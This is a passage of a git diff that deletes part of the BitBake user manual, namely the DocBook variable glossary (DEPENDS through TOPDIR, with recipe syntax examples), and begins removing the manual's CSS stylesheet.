- "b" that produce similarly named packages.
- In this example, the <filename>DEPENDS</filename>
- statement appears in the "a" recipe:
- <literallayout class='monospaced'>
- DEPENDS = "b"
- </literallayout>
- Here, the dependency is such that the
- <filename>do_configure</filename> task for recipe "a"
- depends on the <filename>do_populate_sysroot</filename>
- task of recipe "b".
- This means anything that recipe "b" puts into sysroot
- is available when recipe "a" is configuring itself.
- </para>
-
- <para>
- For information on runtime dependencies, see the
- <link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-DESCRIPTION'><glossterm>DESCRIPTION</glossterm>
- <glossdef>
- <para>
- A long description for the recipe.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-DL_DIR'><glossterm>DL_DIR</glossterm>
- <glossdef>
- <para>
- The central download directory used by the build process to
- store downloads.
- By default, <filename>DL_DIR</filename> gets files
- suitable for mirroring for everything except Git
- repositories.
- If you want tarballs of Git repositories, use the
- <link linkend='var-bb-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></link>
- variable.
- </para>
- </glossdef>
-
- </glossentry>
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-e'><title>E</title>
-
- <glossentry id='var-bb-EXCLUDE_FROM_WORLD'><glossterm>EXCLUDE_FROM_WORLD</glossterm>
- <glossdef>
- <para>
- Directs BitBake to exclude a recipe from world builds (i.e.
- <filename>bitbake world</filename>).
- During world builds, BitBake locates, parses and builds all
- recipes found in every layer exposed in the
- <filename>bblayers.conf</filename> configuration file.
- </para>
-
- <para>
- To exclude a recipe from a world build using this variable,
- set the variable to "1" in the recipe.
- </para>
-
- <note>
- Recipes added to <filename>EXCLUDE_FROM_WORLD</filename>
- may still be built during a world build in order to satisfy
- dependencies of other recipes.
- Adding a recipe to <filename>EXCLUDE_FROM_WORLD</filename>
- only ensures that the recipe is not explicitly added
- to the list of build targets in a world build.
- </note>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-f'><title>F</title>
-
- <glossentry id='var-bb-FAKEROOT'><glossterm>FAKEROOT</glossterm>
- <glossdef>
- <para>
- Contains the command to use when running a shell script
- in a fakeroot environment.
- The <filename>FAKEROOT</filename> variable is obsolete
- and has been replaced by the other
- <filename>FAKEROOT*</filename> variables.
- See these entries in the glossary for more information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FAKEROOTBASEENV'><glossterm>FAKEROOTBASEENV</glossterm>
- <glossdef>
- <para>
- Lists environment variables to set when executing
- the command defined by
- <link linkend='var-bb-FAKEROOTCMD'><filename>FAKEROOTCMD</filename></link>
- that starts the bitbake-worker process
- in the fakeroot environment.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FAKEROOTCMD'><glossterm>FAKEROOTCMD</glossterm>
- <glossdef>
- <para>
- Contains the command that starts the bitbake-worker
- process in the fakeroot environment.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FAKEROOTDIRS'><glossterm>FAKEROOTDIRS</glossterm>
- <glossdef>
- <para>
- Lists directories to create before running a task in
- the fakeroot environment.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FAKEROOTENV'><glossterm>FAKEROOTENV</glossterm>
- <glossdef>
- <para>
- Lists environment variables to set when running a task
- in the fakeroot environment.
- For additional information on environment variables and
- the fakeroot environment, see the
- <link linkend='var-bb-FAKEROOTBASEENV'><filename>FAKEROOTBASEENV</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FAKEROOTNOENV'><glossterm>FAKEROOTNOENV</glossterm>
- <glossdef>
- <para>
- Lists environment variables to set when running a task
- that is not in the fakeroot environment.
- For additional information on environment variables and
- the fakeroot environment, see the
- <link linkend='var-bb-FAKEROOTENV'><filename>FAKEROOTENV</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FETCHCMD'><glossterm>FETCHCMD</glossterm>
- <glossdef>
- <para>
- Defines the command the BitBake fetcher module
- executes when running fetch operations.
- You need to use an override suffix when you use the
- variable (e.g. <filename>FETCHCMD_git</filename>
- or <filename>FETCHCMD_svn</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FILE'><glossterm>FILE</glossterm>
- <glossdef>
- <para>
- Points at the current file.
- BitBake sets this variable during the parsing process
- to identify the file being parsed.
- BitBake also sets this variable when a recipe is being
- executed to identify the recipe file.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-FILESPATH'><glossterm>FILESPATH</glossterm>
- <glossdef>
- <para>
- Specifies directories BitBake uses when searching for
- patches and files.
- The "local" fetcher module uses these directories when
- handling <filename>file://</filename> URLs.
- The variable behaves like a shell <filename>PATH</filename>
- environment variable.
- The value is a colon-separated list of directories that
- are searched left-to-right in order.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-
- <glossdiv id='var-bb-glossary-g'><title>G</title>
-
- <glossentry id='var-bb-GITDIR'><glossterm>GITDIR</glossterm>
- <glossdef>
- <para>
- The directory in which a local copy of a Git repository
- is stored when it is cloned.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-
- <glossdiv id='var-bb-glossary-h'><title>H</title>
-
- <glossentry id='var-bb-HGDIR'><glossterm>HGDIR</glossterm>
- <glossdef>
- <para>
- The directory in which files checked out of a Mercurial
- system are stored.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-HOMEPAGE'><glossterm>HOMEPAGE</glossterm>
- <glossdef>
- <para>Website where more information about the software the recipe is building
- can be found.</para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-i'><title>I</title>
-
- <glossentry id='var-bb-INHERIT'><glossterm>INHERIT</glossterm>
- <glossdef>
- <para>
- Causes the named class or classes to be inherited globally.
- Anonymous functions in the class or classes
- are not executed for the
- base configuration and in each individual recipe.
- The OpenEmbedded build system ignores changes to
- <filename>INHERIT</filename> in individual recipes.
- </para>
-
- <para>
- For more information on <filename>INHERIT</filename>, see
- the
- "<link linkend="inherit-configuration-directive"><filename>INHERIT</filename> Configuration Directive</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-<!--
- <glossdiv id='var-glossary-j'><title>J</title>
- </glossdiv>
-
- <glossdiv id='var-glossary-k'><title>K</title>
- </glossdiv>
--->
-
- <glossdiv id='var-bb-glossary-l'><title>L</title>
-
- <glossentry id='var-bb-LAYERDEPENDS'><glossterm>LAYERDEPENDS</glossterm>
- <glossdef>
- <para>Lists the layers, separated by spaces, upon which this recipe depends.
- Optionally, you can specify a specific layer version for a dependency
- by adding it to the end of the layer name with a colon, (e.g. "anotherlayer:3"
- to be compared against
- <link linkend='var-bb-LAYERVERSION'><filename>LAYERVERSION</filename></link><filename>_anotherlayer</filename>
- in this case).
- BitBake produces an error if any dependency is missing or
- the version numbers do not match exactly (if specified).</para>
- <para>
- You use this variable in the <filename>conf/layer.conf</filename> file.
- You must also use the specific layer name as a suffix
- to the variable (e.g. <filename>LAYERDEPENDS_mylayer</filename>).</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-LAYERDIR'><glossterm>LAYERDIR</glossterm>
- <glossdef>
- <para>When used inside the <filename>layer.conf</filename> configuration
- file, this variable provides the path of the current layer.
- This variable is not available outside of <filename>layer.conf</filename>
- and references are expanded immediately when parsing of the file completes.</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-LAYERDIR_RE'><glossterm>LAYERDIR_RE</glossterm>
- <glossdef>
- <para>When used inside the <filename>layer.conf</filename> configuration
- file, this variable provides the path of the current layer,
- escaped for use in a regular expression
- (<link linkend='var-bb-BBFILE_PATTERN'><filename>BBFILE_PATTERN</filename></link>).
- This variable is not available outside of <filename>layer.conf</filename>
- and references are expanded immediately when parsing of the file completes.</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-LAYERVERSION'><glossterm>LAYERVERSION</glossterm>
- <glossdef>
- <para>Optionally specifies the version of a layer as a single number.
- You can use this variable within
- <link linkend='var-bb-LAYERDEPENDS'><filename>LAYERDEPENDS</filename></link>
- for another layer in order to depend on a specific version
- of the layer.</para>
- <para>
- You use this variable in the <filename>conf/layer.conf</filename> file.
- You must also use the specific layer name as a suffix
- to the variable (e.g. <filename>LAYERDEPENDS_mylayer</filename>).</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-LICENSE'><glossterm>LICENSE</glossterm>
- <glossdef>
- <para>
- The list of source licenses for the recipe.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-m'><title>M</title>
-
- <glossentry id='var-bb-MIRRORS'><glossterm>MIRRORS</glossterm>
- <glossdef>
- <para>
- Specifies additional paths from which BitBake gets source code.
- When the build system searches for source code, it first
- tries the local download directory.
- If that location fails, the build system tries locations
- defined by
- <link linkend='var-bb-PREMIRRORS'><filename>PREMIRRORS</filename></link>,
- the upstream source, and then locations specified by
- <filename>MIRRORS</filename> in that order.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-MULTI_PROVIDER_WHITELIST'><glossterm>MULTI_PROVIDER_WHITELIST</glossterm>
- <glossdef>
- <para>
- Allows you to suppress BitBake warnings caused when
- building two separate recipes that provide the same
- output.
- </para>
-
- <para>
- BitBake normally issues a warning when building two
- different recipes where each provides the same output.
- This scenario is usually something the user does not
- want.
- However, cases do exist where it makes sense, particularly
- in the <filename>virtual/*</filename> namespace.
- You can use this variable to suppress BitBake's warnings.
- </para>
-
- <para>
- To use the variable, list provider names (e.g.
- recipe names, <filename>virtual/kernel</filename>,
- and so forth).
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-<!--
- <glossdiv id='var-glossary-n'><title>N</title>
- </glossdiv>
--->
-
- <glossdiv id='var-bb-glossary-o'><title>O</title>
-
- <glossentry id='var-bb-OVERRIDES'><glossterm>OVERRIDES</glossterm>
- <glossdef>
- <para>
- BitBake uses <filename>OVERRIDES</filename> to control
- what variables are overridden after BitBake parses
- recipes and configuration files.
- </para>
-
- <para>
- Following is a simple example that uses an overrides
- list based on machine architectures:
- <literallayout class='monospaced'>
- OVERRIDES = "arm:x86:mips:powerpc"
- </literallayout>
- You can find information on how to use
- <filename>OVERRIDES</filename> in the
- "<link linkend='conditional-syntax-overrides'>Conditional Syntax (Overrides)</link>"
- section.
- </para>
- </glossdef>
- </glossentry>
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-p'><title>P</title>
-
- <glossentry id='var-bb-P4DIR'><glossterm>P4DIR</glossterm>
- <glossdef>
- <para>
- The directory in which a local copy of a Perforce depot
- is stored when it is fetched.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PACKAGES'><glossterm>PACKAGES</glossterm>
- <glossdef>
- <para>The list of packages the recipe creates.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PACKAGES_DYNAMIC'><glossterm>PACKAGES_DYNAMIC</glossterm>
- <glossdef>
- <para>
- A promise that your recipe satisfies runtime dependencies
- for optional modules that are found in other recipes.
- <filename>PACKAGES_DYNAMIC</filename>
- does not actually satisfy the dependencies, it only states that
- they should be satisfied.
- For example, if a hard, runtime dependency
- (<link linkend='var-bb-RDEPENDS'><filename>RDEPENDS</filename></link>)
- of another package is satisfied during the build
- through the <filename>PACKAGES_DYNAMIC</filename>
- variable, but a package with the module name is never actually
- produced, then the other package will be broken.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PE'><glossterm>PE</glossterm>
- <glossdef>
- <para>
- The epoch of the recipe.
- By default, this variable is unset.
- The variable is used to make upgrades possible when the
- versioning scheme changes in some backwards incompatible
- way.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PERSISTENT_DIR'><glossterm>PERSISTENT_DIR</glossterm>
- <glossdef>
- <para>
- Specifies the directory BitBake uses to store data that
- should be preserved between builds.
- In particular, the data stored is the data that uses
- BitBake's persistent data API and the data used by the
- PR Server and PR Service.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PF'><glossterm>PF</glossterm>
- <glossdef>
- <para>
- Specifies the recipe or package name and includes all version and revision
- numbers (i.e. <filename>eglibc-2.13-r20+svnr15508/</filename> and
- <filename>bash-4.2-r1/</filename>).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PN'><glossterm>PN</glossterm>
- <glossdef>
- <para>The recipe name.</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PR'><glossterm>PR</glossterm>
- <glossdef>
- <para>The revision of the recipe.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PREFERRED_PROVIDER'><glossterm>PREFERRED_PROVIDER</glossterm>
- <glossdef>
- <para>
- Determines which recipe should be given preference when
- multiple recipes provide the same item.
- You should always suffix the variable with the name of the
- provided item, and you should set it to the
- <link linkend='var-bb-PN'><filename>PN</filename></link>
- of the recipe to which you want to give precedence.
- Some examples:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
- PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
- PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PREFERRED_PROVIDERS'><glossterm>PREFERRED_PROVIDERS</glossterm>
- <glossdef>
- <para>
- Determines which recipe should be given preference for
- cases where multiple recipes provide the same item.
- Functionally,
- <filename>PREFERRED_PROVIDERS</filename> is identical to
- <link linkend='var-bb-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></link>.
- However, the <filename>PREFERRED_PROVIDERS</filename>
- variable lets you define preferences for multiple
- situations using the following form:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDERS = "xxx:yyy aaa:bbb ..."
- </literallayout>
- This form is a convenient replacement for the following:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_xxx = "yyy"
- PREFERRED_PROVIDER_aaa = "bbb"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PREFERRED_VERSION'><glossterm>PREFERRED_VERSION</glossterm>
- <glossdef>
- <para>
- If there are multiple versions of recipes available, this
- variable determines which recipe should be given preference.
- You must always suffix the variable with the
- <link linkend='var-bb-PN'><filename>PN</filename></link>
- you want to select, and you should set
- <link linkend='var-bb-PV'><filename>PV</filename></link>
- accordingly for precedence.
- </para>
-
- <para>
- The <filename>PREFERRED_VERSION</filename> variable
- supports limited wildcard use through the
- "<filename>%</filename>" character.
- You can use the character to match any number of
- characters, which can be useful when specifying versions
- that contain long revision numbers that potentially change.
- Here are two examples:
- <literallayout class='monospaced'>
- PREFERRED_VERSION_python = "2.7.3"
- PREFERRED_VERSION_linux-yocto = "4.12%"
- </literallayout>
- <note><title>Important</title>
- The use of the "<filename>%</filename>" character
- is limited in that it only works at the end of the
- string.
- You cannot use the wildcard character in any other
- location of the string.
- </note>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PREMIRRORS'><glossterm>PREMIRRORS</glossterm>
- <glossdef>
- <para>
- Specifies additional paths from which BitBake gets source code.
- When the build system searches for source code, it first
- tries the local download directory.
- If that location fails, the build system tries locations
- defined by <filename>PREMIRRORS</filename>, the upstream
- source, and then locations specified by
- <link linkend='var-bb-MIRRORS'><filename>MIRRORS</filename></link>
- in that order.
- </para>
-
- <para>
- Typically, you would add a specific server for the
- build system to attempt before any others by adding
- something like the following to your configuration:
- <literallayout class='monospaced'>
- PREMIRRORS_prepend = "\
- git://.*/.* http://www.yoctoproject.org/sources/ \n \
- ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
- http://.*/.* http://www.yoctoproject.org/sources/ \n \
- https://.*/.* http://www.yoctoproject.org/sources/ \n"
- </literallayout>
- These changes cause the build system to intercept
- Git, FTP, HTTP, and HTTPS requests and direct them to
- the <filename>http://</filename> sources mirror.
- You can use <filename>file://</filename> URLs to point
- to local directories or network shares as well.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PROVIDES'><glossterm>PROVIDES</glossterm>
- <glossdef>
- <para>
- A list of aliases by which a particular recipe can be
- known.
- By default, a recipe's own
- <filename><link linkend='var-bb-PN'>PN</link></filename>
- is implicitly already in its <filename>PROVIDES</filename>
- list.
- If a recipe uses <filename>PROVIDES</filename>, the
- additional aliases are synonyms for the recipe and can
- be useful satisfying dependencies of other recipes during
- the build as specified by
- <filename><link linkend='var-bb-DEPENDS'>DEPENDS</link></filename>.
- </para>
-
- <para>
- Consider the following example
- <filename>PROVIDES</filename> statement from a recipe
- file <filename>libav_0.8.11.bb</filename>:
- <literallayout class='monospaced'>
- PROVIDES += "libpostproc"
- </literallayout>
- The <filename>PROVIDES</filename> statement results in
- the "libav" recipe also being known as "libpostproc".
- </para>
-
- <para>
- In addition to providing recipes under alternate names,
- the <filename>PROVIDES</filename> mechanism is also used
- to implement virtual targets.
- A virtual target is a name that corresponds to some
- particular functionality (e.g. a Linux kernel).
- Recipes that provide the functionality in question list the
- virtual target in <filename>PROVIDES</filename>.
- Recipes that depend on the functionality in question can
- include the virtual target in
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- to leave the choice of provider open.
- </para>
-
- <para>
- Conventionally, virtual targets have names on the form
- "virtual/function" (e.g. "virtual/kernel").
- The slash is simply part of the name and has no
- syntactical significance.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PRSERV_HOST'><glossterm>PRSERV_HOST</glossterm>
- <glossdef>
- <para>
- The network based
- <link linkend='var-bb-PR'><filename>PR</filename></link>
- service host and port.
- </para>
-
- <para>
- Following is an example of how the <filename>PRSERV_HOST</filename> variable is
- set:
- <literallayout class='monospaced'>
- PRSERV_HOST = "localhost:0"
- </literallayout>
- You must set the variable if you want to automatically
- start a local PR service.
- You can set <filename>PRSERV_HOST</filename> to other
- values to use a remote PR service.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-PV'><glossterm>PV</glossterm>
- <glossdef>
- <para>The version of the recipe.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-<!--
- <glossdiv id='var-glossary-q'><title>Q</title>
- </glossdiv>
--->
-
- <glossdiv id='var-bb-glossary-r'><title>R</title>
-
- <glossentry id='var-bb-RDEPENDS'><glossterm>RDEPENDS</glossterm>
- <glossdef>
- <para>
- Lists a package's runtime dependencies (i.e. other packages)
- that must be installed in order for the built package to run
- correctly.
- If a package in this list cannot be found during the build,
- you will get a build error.
- </para>
-
- <para>
- Because the <filename>RDEPENDS</filename> variable applies
- to packages being built, you should always use the variable
- in a form with an attached package name.
- For example, suppose you are building a development package
- that depends on the <filename>perl</filename> package.
- In this case, you would use the following
- <filename>RDEPENDS</filename> statement:
- <literallayout class='monospaced'>
- RDEPENDS_${PN}-dev += "perl"
- </literallayout>
- In the example, the development package depends on
- the <filename>perl</filename> package.
- Thus, the <filename>RDEPENDS</filename> variable has the
- <filename>${PN}-dev</filename> package name as part of the
- variable.
- </para>
-
- <para>
- BitBake supports specifying versioned dependencies.
- Although the syntax varies depending on the packaging
- format, BitBake hides these differences from you.
- Here is the general syntax to specify versions with
- the <filename>RDEPENDS</filename> variable:
- <literallayout class='monospaced'>
- RDEPENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
- </literallayout>
- For <filename>operator</filename>, you can specify the
- following:
- <literallayout class='monospaced'>
- =
- &lt;
- &gt;
- &lt;=
- &gt;=
- </literallayout>
- For example, the following sets up a dependency on version
- 1.2 or greater of the package <filename>foo</filename>:
- <literallayout class='monospaced'>
- RDEPENDS_${PN} = "foo (>= 1.2)"
- </literallayout>
- </para>
-
- <para>
- For information on build-time dependencies, see the
- <link linkend='var-bb-DEPENDS'><filename>DEPENDS</filename></link>
- variable.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-REPODIR'><glossterm>REPODIR</glossterm>
- <glossdef>
- <para>
- The directory in which a local copy of a
- <filename>google-repo</filename> directory is stored
- when it is synced.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-RPROVIDES'><glossterm>RPROVIDES</glossterm>
- <glossdef>
- <para>
- A list of package name aliases that a package also provides.
- These aliases are useful for satisfying runtime dependencies
- of other packages both during the build and on the target
- (as specified by
- <filename><link linkend='var-bb-RDEPENDS'>RDEPENDS</link></filename>).
- </para>
- <para>
- As with all package-controlling variables, you must always
- use the variable in conjunction with a package name override.
- Here is an example:
- <literallayout class='monospaced'>
- RPROVIDES_${PN} = "widget-abi-2"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-RRECOMMENDS'><glossterm>RRECOMMENDS</glossterm>
- <glossdef>
- <para>
- A list of packages that extends the usability of a package
- being built.
- The package being built does not depend on this list of
- packages in order to successfully build, but needs them for
- the extended usability.
- To specify runtime dependencies for packages, see the
- <filename><link linkend='var-bb-RDEPENDS'>RDEPENDS</link></filename>
- variable.
- </para>
-
- <para>
- BitBake supports specifying versioned recommends.
- Although the syntax varies depending on the packaging
- format, BitBake hides these differences from you.
- Here is the general syntax to specify versions with
- the <filename>RRECOMMENDS</filename> variable:
- <literallayout class='monospaced'>
- RRECOMMENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
- </literallayout>
- For <filename>operator</filename>, you can specify the
- following:
- <literallayout class='monospaced'>
- =
- &lt;
- &gt;
- &lt;=
- &gt;=
- </literallayout>
- For example, the following sets up a recommend on version
- 1.2 or greater of the package <filename>foo</filename>:
- <literallayout class='monospaced'>
- RRECOMMENDS_${PN} = "foo (>= 1.2)"
- </literallayout>
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-s'><title>S</title>
-
- <glossentry id='var-bb-SECTION'><glossterm>SECTION</glossterm>
- <glossdef>
- <para>The section in which packages should be categorized.</para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-SRC_URI'><glossterm>SRC_URI</glossterm>
- <glossdef>
- <para>
- The list of source files - local or remote.
- This variable tells BitBake which bits
- to pull for the build and how to pull them.
- For example, if the recipe or append file needs to
- fetch a single tarball from the Internet, the recipe or
- append file uses a <filename>SRC_URI</filename>
- entry that specifies that tarball.
- On the other hand, if the recipe or append file needs to
- fetch a tarball and include a custom file, the recipe or
- append file needs an <filename>SRC_URI</filename> variable
- that specifies all those sources.</para>
- <para>The following list explains the available URI protocols:
- <itemizedlist>
- <listitem><para><emphasis><filename>file://</filename> -</emphasis>
- Fetches files, which are usually files shipped with
- the metadata,
- from the local machine.
- The path is relative to the
- <link linkend='var-bb-FILESPATH'><filename>FILESPATH</filename></link>
- variable.</para></listitem>
- <listitem><para><emphasis><filename>bzr://</filename> -</emphasis> Fetches files from a
- Bazaar revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>git://</filename> -</emphasis> Fetches files from a
- Git revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>osc://</filename> -</emphasis> Fetches files from
- an OSC (OpenSUSE Build service) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>repo://</filename> -</emphasis> Fetches files from
- a repo (Git) repository.</para></listitem>
- <listitem><para><emphasis><filename>http://</filename> -</emphasis> Fetches files from
- the Internet using HTTP.</para></listitem>
- <listitem><para><emphasis><filename>https://</filename> -</emphasis> Fetches files
- from the Internet using HTTPS.</para></listitem>
- <listitem><para><emphasis><filename>ftp://</filename> -</emphasis> Fetches files
- from the Internet using FTP.</para></listitem>
- <listitem><para><emphasis><filename>cvs://</filename> -</emphasis> Fetches files from
- a CVS revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>hg://</filename> -</emphasis> Fetches files from
- a Mercurial (<filename>hg</filename>) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>p4://</filename> -</emphasis> Fetches files from
- a Perforce (<filename>p4</filename>) revision control repository.</para></listitem>
- <listitem><para><emphasis><filename>ssh://</filename> -</emphasis> Fetches files from
- a secure shell.</para></listitem>
- <listitem><para><emphasis><filename>svn://</filename> -</emphasis> Fetches files from
- a Subversion (<filename>svn</filename>) revision control repository.</para></listitem>
- </itemizedlist>
- </para>
- <para>Here are some additional options worth mentioning:
- <itemizedlist>
- <listitem><para><emphasis><filename>unpack</filename> -</emphasis> Controls
- whether or not to unpack the file if it is an archive.
- The default action is to unpack the file.</para></listitem>
- <listitem><para><emphasis><filename>subdir</filename> -</emphasis> Places the file
- (or extracts its contents) into the specified
- subdirectory.
- This option is useful for unusual tarballs or other archives that
- do not have their files already in a subdirectory within the archive.
- </para></listitem>
- <listitem><para><emphasis><filename>name</filename> -</emphasis> Specifies a
- name to be used for association with <filename>SRC_URI</filename> checksums
- when you have more than one file specified in <filename>SRC_URI</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>downloadfilename</filename> -</emphasis> Specifies
- the filename used when storing the downloaded file.</para></listitem>
- </itemizedlist>
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-SRCDATE'><glossterm>SRCDATE</glossterm>
- <glossdef>
- <para>
- The date of the source code used to build the package.
- This variable applies only if the source was fetched from a Source Code Manager (SCM).
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-SRCREV'><glossterm>SRCREV</glossterm>
- <glossdef>
- <para>
- The revision of the source code used to build the package.
- This variable applies only when using Subversion, Git, Mercurial and Bazaar.
- If you want to build a fixed revision and you want
- to avoid performing a query on the remote repository every time
- BitBake parses your recipe, you should specify a <filename>SRCREV</filename> that is a
- full revision identifier and not just a tag.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-SRCREV_FORMAT'><glossterm>SRCREV_FORMAT</glossterm>
- <glossdef>
- <para>
- Helps construct valid
- <link linkend='var-bb-SRCREV'><filename>SRCREV</filename></link>
- values when multiple source controlled URLs are used in
- <link linkend='var-bb-SRC_URI'><filename>SRC_URI</filename></link>.
- </para>
-
- <para>
- The system needs help constructing these values under these
- circumstances.
- Each component in the <filename>SRC_URI</filename>
- is assigned a name and these are referenced
- in the <filename>SRCREV_FORMAT</filename> variable.
- Consider an example with URLs named "machine" and "meta".
- In this case, <filename>SRCREV_FORMAT</filename> could look
- like "machine_meta" and those names would have the SCM
- versions substituted into each position.
- Only one <filename>AUTOINC</filename> placeholder is added
- and if needed.
- And, this placeholder is placed at the start of the
- returned string.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-STAMP'><glossterm>STAMP</glossterm>
- <glossdef>
- <para>
- Specifies the base path used to create recipe stamp files.
- The path to an actual stamp file is constructed by evaluating this
- string and then appending additional information.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-STAMPCLEAN'><glossterm>STAMPCLEAN</glossterm>
- <glossdef>
- <para>
- Specifies the base path used to create recipe stamp files.
- Unlike the
- <link linkend='var-bb-STAMP'><filename>STAMP</filename></link>
- variable, <filename>STAMPCLEAN</filename> can contain
- wildcards to match the range of files a clean operation
- should remove.
- BitBake uses a clean operation to remove any other stamps
- it should be removing when creating a new stamp.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-SUMMARY'><glossterm>SUMMARY</glossterm>
- <glossdef>
- <para>
- A short summary for the recipe, which is 72 characters or less.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-SVNDIR'><glossterm>SVNDIR</glossterm>
- <glossdef>
- <para>
- The directory in which files checked out of a Subversion
- system are stored.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
- <glossdiv id='var-bb-glossary-t'><title>T</title>
-
- <glossentry id='var-bb-T'><glossterm>T</glossterm>
- <glossdef>
- <para>Points to a directory were BitBake places
- temporary files, which consist mostly of task logs and
- scripts, when building a particular recipe.
- </para>
- </glossdef>
- </glossentry>
-
- <glossentry id='var-bb-TOPDIR'><glossterm>TOPDIR</glossterm>
- <glossdef>
- <para>
- Points to the build directory.
- BitBake automatically sets this variable.
- </para>
- </glossdef>
- </glossentry>
-
- </glossdiv>
-
-<!--
- <glossdiv id='var-glossary-u'><title>U</title>
- </glossdiv>
-
- <glossdiv id='var-glossary-v'><title>V</title>
- </glossdiv>
-
- <glossdiv id='var-glossary-w'><title>W</title>
- </glossdiv>
-
- <glossdiv id='var-glossary-x'><title>X</title>
- </glossdiv>
-
- <glossdiv id='var-glossary-y'><title>Y</title>
- </glossdiv>
-
- <glossdiv id='var-glossary-z'><title>Z</title>
- </glossdiv>
--->
-
-
-</glossary>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css
deleted file mode 100644
index 65da2a4e31..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-style.css
+++ /dev/null
@@ -1,984 +0,0 @@
-/*
- Generic XHTML / DocBook XHTML CSS Stylesheet.
-
- Browser wrangling and typographic design by
- Oyvind Kolas / pippin@gimp.org
-
- Customised for Poky by
- Matthew Allum / mallum@o-hand.com
-
- Thanks to:
- Liam R. E. Quin
- William Skaggs
- Jakub Steiner
-
- Structure
- ---------
-
- The stylesheet is divided into the following sections:
-
- Positioning
- Margins, paddings, width, font-size, clearing.
- Decorations
- Borders, style
- Colors
- Colors
- Graphics
- Graphical backgrounds
- Nasty IE tweaks
- Workarounds needed to make it work in internet explorer,
- currently makes the stylesheet non validating, but up until
